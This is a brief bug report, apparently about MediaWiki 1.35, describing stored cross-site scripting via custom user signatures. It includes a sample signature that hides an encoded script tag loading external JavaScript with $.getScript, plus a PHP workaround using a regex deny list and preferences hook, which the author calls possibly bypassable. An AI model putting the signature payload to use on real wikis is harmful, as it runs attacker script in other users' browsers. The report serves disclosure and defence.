Under MediaWiki 1.35, possibly, also later versions.
If custom user signatures are allowed, a specially constructed signature can load an external JavaScript.
Example of such signature: <span style="display: none;">[[#%3Cscript%3E$.getScript('//people.wikimedia.org/~zabe/alert.js')%3C/script%3E| </span>[[Участник:User name|User name]]. The domain in the example is real! (UPD: replaced with a save example)
Workaround (possibly vulnerable, so, better not published):
$wgSignatureValidation = 'disallow'; $wgSignatureBlacklist = [ '/script/i', '/basemetrik/i' ]; $wgHooks['PreferencesFormPreSave'][] = function( array $formData, PreferencesFormOOUI $form, User $user, bool &$result, array $oldUserOptions ): bool { global $wgSignatureBlacklist; foreach ( $wgSignatureBlacklist as $pattern ) { if ( preg_match( $pattern, $formData['nickname'] ) ) { $user->setOption( 'nickname', null ); } } return true; };